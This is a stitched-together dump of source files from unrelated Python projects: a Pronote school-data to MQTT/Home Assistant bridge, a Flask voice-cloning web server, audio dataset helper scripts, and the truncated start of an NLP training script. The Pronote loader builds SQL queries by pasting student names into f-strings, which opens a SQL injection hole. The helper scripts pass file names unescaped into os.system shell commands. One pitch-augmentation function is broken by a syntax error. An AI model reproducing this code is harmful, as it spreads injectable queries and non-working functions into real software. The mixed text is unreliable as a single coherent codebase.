dateend = datetime.date.today() + relativedelta(days=7)
dateend = dateend.strftime("%Y/%m/%d")
query = f"SELECT * FROM homework WHERE studentname = '{studentname}' and homeworkDate between '{datestart}' and '{dateend}' order by homeworkDate"
self.cur.execute(query)
queryResult = self.cur.fetchall()
# Create object Homework
for result in queryResult:
myHomework = Homework(result)
student.homeworkList.append(myHomework)
def _loadEvaluationsShortList(self,student):
studentname=student.studentFullname
# not collecting all
datestart = datetime.date.today() - relativedelta(days=30)
datestart = datestart.strftime("%Y/%m/%d")
query = f"SELECT * FROM evaluations WHERE studentname like '{studentname}' and date >= '{datestart}' ORDER by date desc"
self.cur.execute(query)
queryResult = self.cur.fetchall()
# Create object Eval
for result in queryResult:
myEvaluation = Evaluations(result)
student.evaluationShortList.append(myEvaluation)
def _loadAbsenceShortList(self,student):
studentname=student.studentFullname
# not collecting all
datestart = datetime.date.today() - relativedelta(days=30)
datestart = datestart.strftime("%Y/%m/%d %H:%M")
query = f"SELECT * FROM absences WHERE studentname like '{studentname}' and from_date >= '{datestart}' and period_name like 'Année continue'"
self.cur.execute(query)
queryResult = self.cur.fetchall()
# Create object Absence
for result in queryResult:
myAbsence = Absences(result)
student.absenceShortList.append(myAbsence)
# Load averages
def _loadAverage(self,student):
studentname=student.studentFullname
# averages have been loaded for all periods but are the same for all periods, extracting only Yeardata
query = f"SELECT * FROM averages WHERE studentname like '{studentname}' and period_name like 'Année continue'"
self.cur.execute(query)
queryResult = self.cur.fetchall()
# Create object Homework
for result in queryResult:
myAverage = Averages(result)
student.averageList.append(myAverage)
# Load grades
def _loadGradesShortList(self,student):
studentname=student.studentFullname
datestart = datetime.date.today() - relativedelta(days=30)
datestart = datestart.strftime("%Y/%m/%d")
query = f"SELECT * FROM grades WHERE studentname like '{studentname}' and date >= '{datestart}' and period_name like 'Année continue' ORDER by date desc"
self.cur.execute(query)
queryResult = self.cur.fetchall()
# Create object Homework
for result in queryResult:
myGrade = Grades(result)
student.gradeList.append(myGrade)
# load lessons
def _loadLessonsShortList(self,student):
studentname=student.studentFullname
# not collecting all
datestart = datetime.date.today().strftime("%Y/%m/%d %H:%M")
dateend = datetime.date.today() + relativedelta(days=7)
dateend = dateend.strftime("%Y/%m/%d %H:%M")
query = f"SELECT * FROM lessons WHERE studentname like '{studentname}' and lessonDateTime between '{datestart}' and '{dateend}' ORDER by lessonDateTime"
self.cur.execute(query)
queryResult = self.cur.fetchall()
# Create object Eval
for result in queryResult:
myLesson = Lessons(result)
student.lessonShortList.append(myLesson)
# classes
class Grades():
def __init__(self,result):
self.pid = result[0]
self.period_name = result[1]
self.period_start = result[2]
self.period_end = result[3]
self.gid = result[4]
self.student = result[5]
self.date = result[6]
self.subject = result[7]
self.grade = result[8]
self.outOf = result[9]
self.defaultOutOf = result[10]
self.coefficient = result[11]
self.average = result[12]
self.max = result[13]
self.min = result[14]
self.comment = result[15]
class Averages():
def __init__(self,result):
self.pid = result[0]
self.period_name = result[1]
self.period_start = result[2]
self.period_end = result[3]
self.studentname = result[4]
self.studentAverage = result[5]
self.classAverage = result[6]
self.max = result[7]
self.min = result[8]
self.outOf = result[9]
self.defaultOutOf = result[10]
self.subject = result[11]
class Periods():
def __init__(self,result):
self.pid = result[0]
self.student = result[1]
self.periodName = result[2]
self.periodStart = result[3]
self.periodEnd = result[4]
class Evaluations():
def __init__(self,result):
self.pid = result[0]
self.period_name = result[1]
self.period_start = result[2]
self.period_end = result[3]
self.studentname = result[4]
self.eid = result[5]
self.evalName = result[6]
self.evalDomain = result[7]
self.evalTeacher = result[8]
self.evalCoefficient = result[9]
self.evalDescription = result[10]
self.evalSubject = result[11]
self.evalDate = result[12]
self.acqId = result[13]
self.acqName = result[14]
self.acqLevel = result[15]
self.acqCoefficient = result[16]
class Absences():
def __init__(self,result):
self.pid = result[0]
self.period_name = result[1]
self.period_start = result[2]
self.period_end = result[3]
self.studentname = result[4]
self.abid = result[5]
self.absenceFrom = result[6]
self.absenceTo = result[7]
self.absenceJustified = result[8]
self.absenceHours = result[9]
self.absenceDays = result[10]
self.absenceReasons = result[11]
class Lessons():
def __init__(self,result):
self.lid = result[0]
self.studentname = result[1]
self.lessonDateTime = result[2]
self.lessonStart = result[3]
self.lessonEnd = result[4]
self.lessonSubject = result[5]
self.lessonRoom = result[6]
self.lessonCanceled = result[7]
self.lessonStatus = result[8]
class Homework():
def __init__(self,result):
self.hid = result[0]
self.studentname = result[1]
self.homeworkSubject = result[2]
self.homeworkDescription = result[3]
self.homeworkDone = result[4]
self.homeworkDate = result[5]
class Student():
def __init__(self,result):
self.sid = result[0]
self.studentFullname = result[1]
self.studentSchool = result[2]
self.studentClass = result[3]
self.homeworkList = []
self.evaluationShortList = []
self.absenceShortList = []
self.averageList = []
self.gradeList = []
self.lessonShortList = []
```
#### File: pronote2mqtt/app/hass.py
```python
import json
import logging
# Constants
SENSOR = "sensor"
BINARY = "binary_sensor"
# Hass device class
PROBLEM_TYPE = "problem"
NONE_TYPE = None
# Hass state_class
# Hass Others
MANUFACTURER = "PRONOTE"
# Class Home assistant
class Hass:
# Constructor
def __init__(self,prefix):
self.prefix = prefix # discovery prefix
self.deviceList = []
def addDevice(self,device):
self.deviceList.append(device)
return device
# Class Home assistant Device
class Device:
# Constructor
def __init__(self,hass,studentId,deviceId, deviceName):
self.hass = hass
self.id = deviceId
self.name = deviceName
self.entityList = []
self.configPayload = {
"identifiers": [self.id],
"name": self.name,
"model": studentId,
"manufacturer": MANUFACTURER
}
# Add device to hass
hass.addDevice(self)
# Add entity
def addEntity(self,entity):
self.entityList.append(entity)
# Return the state payload of all entities of the device
def getStatePayload(self):
# Init payload
payload = {}
# Append value to list in the corresponding state topic
for myEntity in self.entityList:
payload[myEntity.configTopic] = myEntity.getConfigPayloadJson()
if myEntity.value is not None:
payload[myEntity.stateTopic] = myEntity.value
if myEntity.attributes:
payload[myEntity.attributesTopic] = myEntity.getAttribute()
# Return json formatted
return payload
# Class Home assistant Entity
class Entity:
# Constructor
def __init__(self,device,type,id,name,deviceClass=None,stateClass=None,unit=None):
logging.debug("Initialise hass device %s",id)
# Variables
self.device = device
self.type = type
self.id = id
self.name = name
self.deviceClass = deviceClass
self.stateClass = stateClass
self.unit = unit
self.statePayload = None
self.value = None
self.attributes = {}
# Set topics
self.configTopic = f"{self.device.hass.prefix}/{type}/{self.device.id}/{self.id}/config"
self.stateTopic = f"{self.device.hass.prefix}/{type}/{self.device.id}/{self.id}/state"
self.attributesTopic = f"{self.device.hass.prefix}/{type}/{self.device.id}/{self.id}/attributes"
# Set config payload
self.configPayload = {}
if self.deviceClass is not None:
self.configPayload["device_class"] = self.deviceClass
if self.stateClass is not None:
self.configPayload["state_class"] = self.stateClass
self.configPayload["name"] = f"{self.device.name} {self.name}"
self.configPayload["unique_id"] = f"{self.device.id}_{self.id}"
self.configPayload["state_topic"] = self.stateTopic
self.configPayload["json_attributes_topic"] = f"{self.attributesTopic}"
self.configPayload["device"] = self.device.configPayload
# Add entity to device
self.device.addEntity(self)
# Return config payload in Json format
def getConfigPayloadJson(self):
return json.dumps(self.configPayload)
# Set state value
def setValue(self,value):
self.value = value
# Add attributes
def addAttribute(self,key,value):
self.attributes[key] = value
# Add attributes
def addAttributej(self,value):
self.attributes = value
# Get attributes payload
def getAttribute(self):
return json.dumps(self.attributes)
```
#### File: pronote2mqtt/app/pronote2mqtt.py
```python
import sys
import datetime
import schedule
import time
from dateutil.relativedelta import relativedelta
import logging
import collections
import re
import mqtt
import hass
import param
import database
import traceback
#imports for pronotepy
import pronotepy
import os
from datetime import date
from datetime import timedelta
import json
import pronote
# gazpar2mqtt constants
P2M_VERSION = '0.1.0'
P2M_DB_VERSION = '0.1.0'
#######################################################################
#### Functions
#######################################################################
# Sub to get date with year offset
def _getYearOfssetDate(day, number):
return day - relativedelta(years=number)
# Sub to return format wanted
def _dateTimeToStr(datetime):
return datetime.strftime("%d/%m/%Y - %H:%M:%S")
########################################################################################################################
#### Running program
########################################################################################################################
def run(myParams):
myMqtt = None
myPronote = None
# Store time now
dtn = _dateTimeToStr(datetime.datetime.now())
# STEP 1 : Connect to database
####################################################################################################################
logging.info("-----------------------------------------------------------")
logging.info("# Connexion to SQLite database #")
logging.info("-----------------------------------------------------------")
# Create/Update database
logging.info("Connexion to SQLite database...")
myDb = database.Database(myParams.dbPath)
# Connect to database
myDb.connect(P2M_VERSION,P2M_DB_VERSION)
if myDb.isConnected() :
logging.info("SQLite database connected !")
else:
logging.error("Unable to connect to SQLite database.")
# Check program version
p2mVersion = myDb.getConfig(database.P2M_KEY)
p2mDate = myDb.getConfig(database.LAST_EXEC_KEY)
logging.info("Last execution date %s, program was in version %s.",p2mDate,p2mVersion)
if p2mVersion != P2M_VERSION:
logging.warning("pronote2mqtt version (%s) has changed since last execution (%s)",P2M_VERSION,p2mVersion)
# Update program version
myDb.updateVersion(database.P2M_KEY,P2M_VERSION)
myDb.commit()
# Reinit database when required :
if myParams.dbInit:
logging.info("Reinitialization of the database...")
myDb.reInit(P2M_VERSION,P2M_DB_VERSION)
logging.info("Database reinitialized to version %s",P2M_DB_VERSION)
else:
# Compare dabase version
logging.info("Checking database version...")
dbVersion = myDb.getConfig(database.DB_KEY)
if dbVersion == P2M_DB_VERSION:
logging.info("Your database is already up to date : version %s.",P2M_DB_VERSION)
# Display some (!) current database statistics
logging.info("Retrieve database statistics...")
dbStats = myDb.getGradesCount()
logging.info("%s informatives grades stored", dbStats["rows"])
logging.info("%s Grade(s)", dbStats["gid"])
logging.info("First grade : %s", dbStats["minDate"])
logging.info("Last grade : %s", dbStats["maxDate"])
else:
logging.warning("Your database (version %s) is not up to date.",dbVersion)
logging.info("Reinitialization of your database to version %s...",P2M_DB_VERSION)
myDb.reInit(P2M_VERSION,P2M_DB_VERSION)
dbVersion = myDb.getConfig(database.DB_KEY)
logging.info("Database reinitialized to version %s !",dbVersion)
####################################################################################################################
# STEP 1 : Collect data from pronote
####################################################################################################################
logging.info("-----------------------------------------------------------")
logging.info("# Collection from Pronote #")
logging.info("-----------------------------------------------------------")
myPronote = pronote.Pronote()
#Kick off for Student 1
logging.info("Student 1-----------------------------------------------------")
myPronote.getData(myParams.pronotePrefixUrl_1,myParams.pronoteUsername_1,myParams.pronotePassword_1,myParams.pronoteCas_1,myParams.pronoteGradesAverages_1)
if myParams.pronoteGradesAverages_1:
for myAverage in myPronote.averageList:
myAverage.store(myDb)
for myGrade in myPronote.gradeList:
myGrade.store(myDb)
for myPeriod in myPronote.periodList:
myPeriod.store(myDb)
if not myParams.pronoteGradesAverages_1:
for myEval in myPronote.evalList:
myEval.store(myDb)
for myLesson in myPronote.lessonList:
myLesson.store(myDb)
for myHomework in myPronote.homeworkList:
myHomework.store(myDb)
for myStudent in myPronote.studentList:
myStudent.store(myDb)
for myAbsence in myPronote.absenceList:
myAbsence.store(myDb)
myDb.commit()
#Kick off for Student 2
if myParams.pronoteUsername_2:
logging.info("Student 2-----------------------------------------------------")
myPronote.getData(myParams.pronotePrefixUrl_2,myParams.pronoteUsername_2,myParams.pronotePassword_2,myParams.pronoteCas_2,myParams.pronoteGradesAverages_2)
if myParams.pronoteGradesAverages_2:
for myAverage in myPronote.averageList:
myAverage.store(myDb)
for myGrade in myPronote.gradeList:
myGrade.store(myDb)
for myPeriod in myPronote.periodList:
myPeriod.store(myDb)
if not myParams.pronoteGradesAverages_2:
for myEval in myPronote.evalList:
myEval.store(myDb)
for myLesson in myPronote.lessonList:
myLesson.store(myDb)
for myHomework in myPronote.homeworkList:
myHomework.store(myDb)
for myStudent in myPronote.studentList:
myStudent.store(myDb)
for myAbsence in myPronote.absenceList:
myAbsence.store(myDb)
myDb.commit()
####################################################################################################################
# STEP 2 : Connect to MQTT
####################################################################################################################
####################################################################################################################
logging.info("-----------------------------------------------------------")
logging.info("# Connexion to Mqtt broker #")
logging.info("-----------------------------------------------------------")
try:
logging.info("Connect to Mqtt broker...")
# Create mqtt client
myMqtt = mqtt.Mqtt(myParams.mqttClientId,myParams.mqttUsername,myParams.mqttPassword,myParams.mqttSsl,myParams.mqttQos,myParams.mqttRetain)
# Connect mqtt broker
myMqtt.connect(myParams.mqttHost,myParams.mqttPort)
# Wait for connexion callback
time.sleep(2)
if myMqtt.isConnected:
logging.info("Mqtt broker connected !")
except:
logging.error("Unable to connect to Mqtt broker. Please check that broker is running, or check broker configuration.")
####################################################################################################################
# STEP 3 : Home Assistant sensors load/create from dB
####################################################################################################################
if myMqtt.isConnected \
and myParams.hassDiscovery :
try:
logging.info("-----------------------------------------------------------")
logging.info("# Home assistant sensor #")
logging.info("-----------------------------------------------------------")
# Create hass instance
myHass = hass.Hass(myParams.hassPrefix)
#load data from dB
myDb.load()
# Loop on students
for myStudent in myDb.studentList:
logging.info("Publishing period values of Students %s alias %s...", myStudent.sid, myStudent.studentFullname)
logging.info("---------------------------------")
# Create the device corresponding to the user
deviceId = myParams.hassDeviceName.replace(" ","_") + "_" + myStudent.studentFullname.replace(" ","_")
deviceName = myParams.hassDeviceName + " " + myStudent.studentFullname
myDevice = hass.Device(myHass,myStudent.sid,deviceId,deviceName)
# Create entity Student
logging.info("Creation of the Student entity")
myEntity = hass.Entity(myDevice,hass.SENSOR,'student','student',hass.NONE_TYPE,None,None)
myEntity.setValue(myStudent.studentFullname)
myEntity.addAttribute("school",myStudent.studentSchool)
myEntity.addAttribute("current_class",myStudent.studentClass)
# create homework sensor
logging.info("Creation of the HOMEWORK entity")
myEntity = hass.Entity(myDevice,hass.SENSOR,'homework','homework',hass.NONE_TYPE,None,None)
myEntity.setValue(myStudent.studentFullname)
attributes = {}
if myStudent.homeworkList:
logging.info("Collecting and Publishing values Homework...")
logging.info("---------------------------------")
attributes[f'date'] = []
attributes[f'title'] = []
attributes[f'description'] = []
attributes[f'done'] = []
for myHomework in myStudent.homeworkList:
# Store homework into sensor
attributes[f'date'].append(myHomework.homeworkDate)
attributes[f'title'].append(myHomework.homeworkSubject)
attributes[f'description'].append(re.sub(r'http\S+', '<URL REMOVED, see PRONOTE-APP>', myHomework.homeworkDescription))
attributes[f'done'].append(myHomework.homeworkDone)
myEntity.addAttribute("date",attributes[f'date'])
myEntity.addAttribute("title",attributes[f'title'])
myEntity.addAttribute("description",attributes[f'description'])
myEntity.addAttribute("done",attributes[f'done'])
logging.info("Homework added to HA sensor !")
# create evaluation sensor
logging.info("Creation of the EVALUATION/Acquisitions entity")
myEntity = hass.Entity(myDevice,hass.SENSOR,'evaluation','evaluation',hass.NONE_TYPE,None,None)
myEntity.setValue(myStudent.studentFullname)
logging.info("Collecting and Publishing values Evaluation from shortlist (last x days)...")
attributes = {}
if myStudent.evaluationShortList:
logging.info("Collecting and Publishing values Evaluation from shortlist (last x days)...")
logging.info("---------------------------------")
attributes[f'date'] = []
attributes[f'subject'] = []
attributes[f'acquisition_name'] = []
attributes[f'acquisition_level'] = []
for myEvaluation in myStudent.evaluationShortList:
# Store evaluation into sensor
attributes[f'date'].append(myEvaluation.evalDate)
attributes[f'subject'].append(myEvaluation.evalSubject)
attributes[f'acquisition_name'].append(myEvaluation.acqName)
attributes[f'acquisition_level'].append(myEvaluation.acqLevel)
myEntity.addAttribute("date",attributes[f'date'])
myEntity.addAttribute("subject",attributes[f'subject'])
myEntity.addAttribute("acquisition_name",attributes[f'acquisition_name'])
myEntity.addAttribute("acquisition_level",attributes[f'acquisition_level'])
logging.info("Evaluation added to HA sensor !")
# create absences sensor
logging.info("Creation of the Absences entity")
myEntity = hass.Entity(myDevice,hass.SENSOR,'absence','absence',hass.NONE_TYPE,None,None)
myEntity.setValue(myStudent.studentFullname)
logging.info("Collecting and Publishing values Absences from shortlist (last x days)...")
attributes = {}
if myStudent.absenceShortList:
logging.info("Collecting and Publishing values Absence from shortlist (last x days)...")
logging.info("---------------------------------")
attributes[f'from_date'] = []
attributes[f'hours'] = []
attributes[f'justified'] = []
attributes[f'reasons'] = []
for myAbsence in myStudent.absenceShortList:
# Store evaluation into sensor
attributes[f'from_date'].append(myAbsence.absenceFrom.split("/",1)[1])
attributes[f'hours'].append(myAbsence.absenceHours)
attributes[f'justified'].append(myAbsence.absenceJustified)
attributes[f'reasons'].append(myAbsence.absenceReasons)
myEntity.addAttribute("date",attributes[f'from_date'])
myEntity.addAttribute("hours",attributes[f'hours'])
myEntity.addAttribute("justified",attributes[f'justified'])
myEntity.addAttribute("reason",attributes[f'reasons'])
logging.info("Absence added to HA sensor !")
# create averages sensor
logging.info("Creation of the Averages entity")
myEntity = hass.Entity(myDevice,hass.SENSOR,'average','average',hass.NONE_TYPE,None,None)
myEntity.setValue(myStudent.studentFullname)
logging.info("Collecting and Publishing values Averages from shortlist (last x days)...")
attributes = {}
if myStudent.averageList:
logging.info("Collecting and Publishing values Average from shortlist (last x days)...")
logging.info("---------------------------------")
attributes[f'subject'] = []
attributes[f'student_average'] = []
attributes[f'class_average'] = []
attributes[f'max'] = []
attributes[f'min'] = []
for myAverage in myStudent.averageList:
# Store evaluation into sensor
attributes[f'subject'].append(myAverage.subject)
attributes[f'student_average'].append(myAverage.studentAverage)
attributes[f'class_average'].append(myAverage.classAverage)
attributes[f'max'].append(myAverage.max)
attributes[f'min'].append(myAverage.min)
myEntity.addAttribute("subject",attributes[f'subject'])
myEntity.addAttribute("student_average",attributes[f'student_average'])
myEntity.addAttribute("class_average",attributes[f'class_average'])
myEntity.addAttribute("max",attributes[f'max'])
myEntity.addAttribute("min",attributes[f'min'])
logging.info("Average added to HA sensor !")
# create grades sensor
logging.info("Creation of the Grades entity")
myEntity = hass.Entity(myDevice,hass.SENSOR,'grade','grade',hass.NONE_TYPE,None,None)
myEntity.setValue(myStudent.studentFullname)
logging.info("Collecting and Publishing values Grades from shortlist (last x days)...")
attributes = {}
if myStudent.gradeList:
logging.info("Collecting and Publishing values Grades from shortlist (last x days)...")
logging.info("---------------------------------")
attributes[f'date'] = []
attributes[f'subject'] = []
attributes[f'student_grade'] = []
attributes[f'class_average'] = []
attributes[f'coefficient'] = []
attributes[f'max'] = []
attributes[f'min'] = []
attributes[f'comment'] = []
for myGrade in myStudent.gradeList:
# Store evaluation into sensor
attributes[f'date'].append(myGrade.date)
attributes[f'subject'].append(myGrade.subject)
attributes[f'student_grade'].append(myGrade.defaultOutOf)
attributes[f'class_average'].append(myGrade.average)
attributes[f'coefficient'].append(myGrade.coefficient)
attributes[f'max'].append(myGrade.max)
attributes[f'min'].append(myGrade.min)
attributes[f'comment'].append(myGrade.comment)
myEntity.addAttribute("date",attributes[f'date'])
myEntity.addAttribute("subject",attributes[f'subject'])
myEntity.addAttribute("student_grade",attributes[f'student_grade'])
myEntity.addAttribute("class_average",attributes[f'class_average'])
myEntity.addAttribute("coefficient",attributes[f'coefficient'])
myEntity.addAttribute("max",attributes[f'max'])
myEntity.addAttribute("min",attributes[f'min'])
myEntity.addAttribute("comment",attributes[f'comment'])
logging.info("Grade added to HA sensor !")
# create lessons sensor
logging.info("Creation of the Lesson entity")
myEntity = hass.Entity(myDevice,hass.SENSOR,'lesson','lesson',hass.NONE_TYPE,None,None)
myEntity.setValue(myStudent.studentFullname)
attributes = {}
if myStudent.lessonShortList:
logging.info("Collecting and Publishing values Lessons from shortlist (last x days)...")
logging.info("---------------------------------")
attributes[f'date'] = []
attributes[f'start'] = []
attributes[f'end'] = []
attributes[f'subject'] = []
attributes[f'canceled'] = []
attributes[f'status'] = []
attributes[f'room'] = []
for myLesson in myStudent.lessonShortList:
# Store evaluation into sensor
attributes[f'date'].append(myLesson.lessonDateTime.split(" ",1)[0])
attributes[f'start'].append(myLesson.lessonStart)
attributes[f'end'].append(myLesson.lessonEnd)
attributes[f'subject'].append(myLesson.lessonSubject)
attributes[f'canceled'].append(myLesson.lessonCanceled)
attributes[f'status'].append(myLesson.lessonStatus)
attributes[f'room'].append(myLesson.lessonRoom)
myEntity.addAttribute("date",attributes[f'date'])
myEntity.addAttribute("start",attributes[f'start'])
myEntity.addAttribute("end",attributes[f'end'])
myEntity.addAttribute("subject",attributes[f'subject'])
myEntity.addAttribute("canceled",attributes[f'canceled'])
myEntity.addAttribute("status",attributes[f'status'])
myEntity.addAttribute("room",attributes[f'room'])
logging.info("Lesson added to HA sensor !")
# Publish config, state (when value not none), attributes (when not none)
logging.info("Publishing period devices...")
logging.info("You can retrieve published values subscribing topic %s",myDevice.hass.prefix + "/+/" + myDevice.id + "/#")
for topic,payload in myDevice.getStatePayload().items():
myMqtt.publish(topic,payload)
logging.info("Devices published !")
except:
logging.error("Home Assistant discovery mode : unable to publish period value to mqtt broker")
logging.error(traceback.format_exc())
####################################################################################################################
# STEP 4 : Disconnect mqtt broker (throws errors....to fix in future)
####################################################################################################################
if myMqtt.isConnected:
logging.info("-----------------------------------------------------------")
logging.info("# Disconnexion from MQTT #")
logging.info("-----------------------------------------------------------")
try:
myMqtt.disconnect()
logging.info("Mqtt broker disconnected")
except:
logging.error("Unable to disconnect mqtt broker")
sys.exit(1)
# Release memory
del myMqtt
del myPronote
####################################################################################################################
# STEP 5 : Disconnect from database
####################################################################################################################
logging.info("-----------------------------------------------------------")
logging.info("# Disconnexion from SQLite database #")
logging.info("-----------------------------------------------------------")
if myDb.isConnected() :
myDb.close()
logging.info("SQLite database disconnected")
del myDb
####################################################################################################################
# STEP 6 : Display next run info and end of program
####################################################################################################################
logging.info("-----------------------------------------------------------")
logging.info("# Next run #")
logging.info("-----------------------------------------------------------")
if myParams.scheduleFrequency > 0:
logging.info("The pronote2mqtt runs are scheduled every => %s hours",myParams.scheduleFrequency)
else:
if myParams.scheduleTime is not None:
logging.info("The pronote2mqtt next run is scheduled at %s",myParams.scheduleTime)
else:
logging.info("No schedule or frequency defined.")
logging.info("-----------------------------------------------------------")
logging.info("# End of program #")
logging.info("-----------------------------------------------------------")
########################################################################################################################
#### Main
########################################################################################################################
if __name__ == "__main__":
# Load params
myParams = param.Params()
# Set logging
if myParams.debug:
myLevel = logging.DEBUG
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=myLevel)
else:
myLevel = logging.INFO
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=myLevel)
# Say welcome and be nice
logging.info("-----------------------------------------------------------")
logging.info("# Welcome to pronote2mqtt #")
logging.info("-----------------------------------------------------------")
logging.info("Program version : %s",P2M_VERSION)
logging.info("Database version : %s", P2M_DB_VERSION)
logging.info("Please note that the the tool is still under development, various functions may disappear or be modified.")
logging.debug("If you can read this line, you are in DEBUG mode.")
# Log params info
logging.info("-----------------------------------------------------------")
logging.info("# Program parameters #")
logging.info("-----------------------------------------------------------")
myParams.logParams()
# Check params
logging.info("Check parameters...")
if myParams.checkParams():
logging.info("Parameters are ok !")
else:
logging.error("Error on parameters. End of program.")
quit()
# Run
# if scheduleFrequency set
if myParams.scheduleFrequency is not None:
# Run once at lauch
run(myParams)
schedule.every(myParams.scheduleFrequency).hours.do(run,myParams)
while True:
schedule.run_pending()
time.sleep(1)
else:
# if scheduleTime set
if myParams.scheduleTime is not None:
# Run once at lauch
run(myParams)
schedule.every().day.at(myParams.scheduleTime).do(run,myParams)
while True:
schedule.run_pending()
time.sleep(1)
else:
# Run once
run(myParams)
logging.info("End of pronote2mqtt.")
``` |
{
"source": "jimschenchen/Mocking_Bird_Playground",
"score": 2
} |
#### File: Mocking_Bird_Playground/web/__init__.py
```python
from web.api import api_blueprint
from pathlib import Path
from gevent import pywsgi as wsgi
from flask import Flask, Response, request, render_template
from synthesizer.inference import Synthesizer
from encoder import inference as encoder
from vocoder.hifigan import inference as gan_vocoder
from vocoder.wavernn import inference as rnn_vocoder
import numpy as np
import re
from scipy.io.wavfile import write
import librosa
import io
import base64
from flask_cors import CORS
from flask_wtf import CSRFProtect
import webbrowser
def webApp():
# Init and load config
app = Flask(__name__, instance_relative_config=True)
app.config.from_object("web.config.default")
app.config['RESTPLUS_MASK_SWAGGER'] = False
app.register_blueprint(api_blueprint)
# CORS(app) #允许跨域,注释掉此行则禁止跨域请求
csrf = CSRFProtect(app)
csrf.init_app(app)
syn_models_dirt = "synthesizer/saved_models"
synthesizers = list(Path(syn_models_dirt).glob("**/*.pt"))
synthesizers_cache = {}
encoder.load_model(Path("encoder/saved_models/pretrained.pt"))
rnn_vocoder.load_model(Path("vocoder/saved_models/pretrained/pretrained.pt"))
gan_vocoder.load_model(Path("vocoder/saved_models/pretrained/g_hifigan.pt"))
def pcm2float(sig, dtype='float32'):
"""Convert PCM signal to floating point with a range from -1 to 1.
Use dtype='float32' for single precision.
Parameters
----------
sig : array_like
Input array, must have integral type.
dtype : data type, optional
Desired (floating point) data type.
Returns
-------
numpy.ndarray
Normalized floating point data.
See Also
--------
float2pcm, dtype
"""
sig = np.asarray(sig)
if sig.dtype.kind not in 'iu':
raise TypeError("'sig' must be an array of integers")
dtype = np.dtype(dtype)
if dtype.kind != 'f':
raise TypeError("'dtype' must be a floating point type")
i = np.iinfo(sig.dtype)
abs_max = 2 ** (i.bits - 1)
offset = i.min + abs_max
return (sig.astype(dtype) - offset) / abs_max
# Cache for synthesizer
@csrf.exempt
@app.route("/api/synthesize", methods=["POST"])
def synthesize():
# TODO Implementation with json to support more platform
# Load synthesizer
if "synt_path" in request.form:
synt_path = request.form["synt_path"]
else:
synt_path = synthesizers[0]
print("NO synthsizer is specified, try default first one.")
if synthesizers_cache.get(synt_path) is None:
current_synt = Synthesizer(Path(synt_path))
synthesizers_cache[synt_path] = current_synt
else:
current_synt = synthesizers_cache[synt_path]
print("using synthesizer model: " + str(synt_path))
# Load input wav
if "upfile_b64" in request.form:
wav_base64 = request.form["upfile_b64"]
wav = base64.b64decode(bytes(wav_base64, 'utf-8'))
wav = pcm2float(np.frombuffer(wav, dtype=np.int16), dtype=np.float32)
sample_rate = Synthesizer.sample_rate
else:
wav, sample_rate, = librosa.load(request.files['file'])
write("temp.wav", sample_rate, wav) #Make sure we get the correct wav
encoder_wav = encoder.preprocess_wav(wav, sample_rate)
embed, _, _ = encoder.embed_utterance(encoder_wav, return_partials=True)
# Load input text
texts = filter(None, request.form["text"].split("\n"))
punctuation = '!,。、,' # punctuate and split/clean text
processed_texts = []
for text in texts:
for processed_text in re.sub(r'[{}]+'.format(punctuation), '\n', text).split('\n'):
if processed_text:
processed_texts.append(processed_text.strip())
texts = processed_texts
# synthesize and vocode
embeds = [embed] * len(texts)
specs = current_synt.synthesize_spectrograms(texts, embeds)
spec = np.concatenate(specs, axis=1)
if "vocoder" in request.form and request.form["vocoder"] == "WaveRNN":
wav = rnn_vocoder.infer_waveform(spec)
else:
wav = gan_vocoder.infer_waveform(spec)
# Return cooked wav
out = io.BytesIO()
write(out, Synthesizer.sample_rate, wav.astype(np.float32))
return Response(out, mimetype="audio/wav")
@app.route('/', methods=['GET'])
def index():
return render_template("index.html")
host = app.config.get("HOST")
port = app.config.get("PORT")
web_address = 'http://{}:{}'.format(host, port)
print(f"Web server:" + web_address)
webbrowser.open(web_address)
server = wsgi.WSGIServer((host, port), app)
server.serve_forever()
return app
if __name__ == "__main__":
webApp()
``` |
{
"source": "jim-schwoebel/allie",
"score": 3
} |
#### File: helpers/helpers/balancedelete.py
```python
import os, random, shutil
## helper functions
def get_wav():
# get all .WAV or .MP3 files in folder and count the number of them
listdir=os.listdir()
count=0
for i in range(len(listdir)):
if listdir[i][-4:] in ['.wav', '.mp3']:
count = count+1
return count
def random_remove(remove_num):
# remove a number of files to balnace classes.
listdir=os.listdir()
wavfiles=list()
random.shuffle(listdir)
for i in range(len(listdir)):
if listdir[i][-4:] in ['.wav', '.mp3']:
wavfiles.append(listdir[i])
for i in range(remove_num):
os.remove(wavfiles[i])
print('removed %s .wav or .mp3 files'%(remove_num))
# now go to main script
listdir=os.listdir()
# find all folders
folders=list()
for i in range(len(listdir)):
if listdir[i].find('.') < 0:
folders.append(listdir[i])
curdir=os.getcwd()
counts=list()
for i in range(len(folders)):
os.chdir(curdir)
os.chdir(folders[i])
count=get_wav()
counts.append(count)
# now find minimum
min_=min(counts)
for i in range(len(folders)):
os.chdir(curdir)
os.chdir(folders[i])
count=get_wav()
if count > min_:
remove_num=count-min_
random_remove(remove_num)
```
#### File: helpers/helpers/extract_noise.py
```python
import shutil, os, random
from pydub import AudioSegment
try:
os.mkdir('noise')
except:
shutil.rmtree('noise')
os.mkdir('noise')
def extract_noise(filename, length):
song = AudioSegment.from_mp3(filename)
first = song[100:100+length]
first.export(filename[0:-4]+'_noise.mp3')
shutil.move(os.getcwd()+'/'+filename[0:-4]+'_noise.mp3', os.getcwd()+'/noise/'+filename[0:-4]+'_noise.mp3')
listdir=os.listdir()
mp3files=list()
for i in range(len(listdir)):
if listdir[i][-4:]=='.mp3':
mp3files.append(listdir[i])
random.shuffle(mp3files)
for i in range(len(mp3files)):
extract_noise(mp3files[i],300)
if i == 100:
break
os.chdir('noise')
listdir=os.listdir()
for i in range(len(listdir)):
if listdir[i][-4:]=='.mp3':
os.system('play %s'%(listdir[i]))
remove=input('should remove? type y to remove')
if remove=='y':
os.remove(listdir[i])
```
#### File: augmentation/audio_augmentation/augment_pitch.py
```python
import os, random
def augment_pitch(filename):
basefile=filename[0:-4]
randint=random.randint(300,600)
os.system('sox %s %s pitch %s'%(filename, basefile+'_freq_1.wav', str(randint)))
randint=random.randint(300,600)
os.system('sox %s %s pitch -%s'%(filename, , str(randint)))
return [filename, basefile+'_freq_1.wav',basefile+'_freq_2.wav']
```
#### File: eda_nlp/experiments/b_2_train_eval.py
```python
from b_config import *
from methods import *
from numpy.random import seed
seed(0)
###############################
#### run model and get acc ####
###############################
def run_model(train_file, test_file, num_classes, percent_dataset):
#initialize model
model = build_model(input_size, word2vec_len, num_classes)
#load data
